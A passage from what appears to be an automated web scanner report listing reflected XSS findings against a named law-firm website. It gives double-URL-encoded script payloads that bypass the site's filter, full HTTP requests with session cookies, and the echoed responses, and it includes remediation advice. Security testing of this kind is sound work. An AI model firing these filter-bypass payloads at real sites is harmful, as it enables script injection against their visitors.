The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78055%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea8d52b987de was submitted in the REST URL parameter 1. This input was echoed as 78055"><script>alert(1)</script>a8d52b987de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css78055%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea8d52b987de/ui/ui.accordion.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css78055"><script>alert(1)</script>a8d52b987de/ui/ui.accordion.css" value="">
...[SNIP]...

2.66. http://www.wileyrein.com/css/ui/ui.accordion.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.accordion.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 801be%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e35c17289cf6 was submitted in the REST URL parameter 2. This input was echoed as 801be"><script>alert(1)</script>35c17289cf6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui801be%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e35c17289cf6/ui.accordion.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui801be"><script>alert(1)</script>35c17289cf6/ui.accordion.css" value="">
...[SNIP]...

2.67. http://www.wileyrein.com/css/ui/ui.accordion.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.accordion.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2a82%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb61ee3f3a8a was submitted in the REST URL parameter 3. This input was echoed as a2a82"><script>alert(1)</script>b61ee3f3a8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui/ui.accordion.cssa2a82%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb61ee3f3a8a HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui/ui.accordion.cssa2a82"><script>alert(1)</script>b61ee3f3a8a" value="">
...[SNIP]...

2.68. http://www.wileyrein.com/css/ui/ui.all.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.all.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 874a6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebba185a7c96 was submitted in the REST URL parameter 1. This input was echoed as 874a6"><script>alert(1)</script>bba185a7c96 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css874a6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebba185a7c96/ui/ui.all.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css874a6"><script>alert(1)</script>bba185a7c96/ui/ui.all.css" value="">
...[SNIP]...

2.69. http://www.wileyrein.com/css/ui/ui.all.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.all.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3782d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e27d4aec5989 was submitted in the REST URL parameter 2. This input was echoed as 3782d"><script>alert(1)</script>27d4aec5989 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui3782d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e27d4aec5989/ui.all.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui3782d"><script>alert(1)</script>27d4aec5989/ui.all.css" value="">
...[SNIP]...

2.70. http://www.wileyrein.com/css/ui/ui.all.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.all.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c332a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb48dfbd1665 was submitted in the REST URL parameter 3. This input was echoed as c332a"><script>alert(1)</script>b48dfbd1665 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui/ui.all.cssc332a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb48dfbd1665 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui/ui.all.cssc332a"><script>alert(1)</script>b48dfbd1665" value="">
...[SNIP]...

2.71. http://www.wileyrein.com/css/ui/ui.base.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.base.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9aa04%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3f73509fbde was submitted in the REST URL parameter 1. This input was echoed as 9aa04"><script>alert(1)</script>3f73509fbde in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css9aa04%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3f73509fbde/ui/ui.base.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css9aa04"><script>alert(1)</script>3f73509fbde/ui/ui.base.css" value="">
...[SNIP]...

2.72. http://www.wileyrein.com/css/ui/ui.base.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.base.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a32e5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb7ea1967ea4 was submitted in the REST URL parameter 2. This input was echoed as a32e5"><script>alert(1)</script>b7ea1967ea4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/uia32e5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb7ea1967ea4/ui.base.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/uia32e5"><script>alert(1)</script>b7ea1967ea4/ui.base.css" value="">
...[SNIP]...

2.73. http://www.wileyrein.com/css/ui/ui.base.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.base.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4008%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e674bcd1bc31 was submitted in the REST URL parameter 3. This input was echoed as a4008"><script>alert(1)</script>674bcd1bc31 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui/ui.base.cssa4008%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e674bcd1bc31 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui/ui.base.cssa4008"><script>alert(1)</script>674bcd1bc31" value="">
...[SNIP]...

2.74. http://www.wileyrein.com/css/ui/ui.core.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.core.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfd19%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e32dc5bc06f was submitted in the REST URL parameter 1. This input was echoed as cfd19"><script>alert(1)</script>32dc5bc06f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /csscfd19%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e32dc5bc06f/ui/ui.core.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/csscfd19"><script>alert(1)</script>32dc5bc06f/ui/ui.core.css" value="">
...[SNIP]...

2.75. http://www.wileyrein.com/css/ui/ui.core.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.core.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cac63%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5d010f954eb was submitted in the REST URL parameter 2. This input was echoed as cac63"><script>alert(1)</script>5d010f954eb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/uicac63%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5d010f954eb/ui.core.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/uicac63"><script>alert(1)</script>5d010f954eb/ui.core.css" value="">
...[SNIP]...

2.76. http://www.wileyrein.com/css/ui/ui.core.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.core.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6878%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e49980770f59 was submitted in the REST URL parameter 3. This input was echoed as c6878"><script>alert(1)</script>49980770f59 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui/ui.core.cssc6878%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e49980770f59 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui/ui.core.cssc6878"><script>alert(1)</script>49980770f59" value="">
...[SNIP]...

2.77. http://www.wileyrein.com/css/ui/ui.datepicker.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.datepicker.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbf73%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef798e920d23 was submitted in the REST URL parameter 1. This input was echoed as fbf73"><script>alert(1)</script>f798e920d23 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /cssfbf73%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef798e920d23/ui/ui.datepicker.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/cssfbf73"><script>alert(1)</script>f798e920d23/ui/ui.datepicker.css" value="">
...[SNIP]...

2.78. http://www.wileyrein.com/css/ui/ui.datepicker.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.datepicker.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6749%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e54913b0be8b was submitted in the REST URL parameter 2. This input was echoed as b6749"><script>alert(1)</script>54913b0be8b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/uib6749%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e54913b0be8b/ui.datepicker.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/uib6749"><script>alert(1)</script>54913b0be8b/ui.datepicker.css" value="">
...[SNIP]...

2.79. http://www.wileyrein.com/css/ui/ui.datepicker.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.datepicker.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45672%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4f4fe8f9220 was submitted in the REST URL parameter 3. This input was echoed as 45672"><script>alert(1)</script>4f4fe8f9220 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

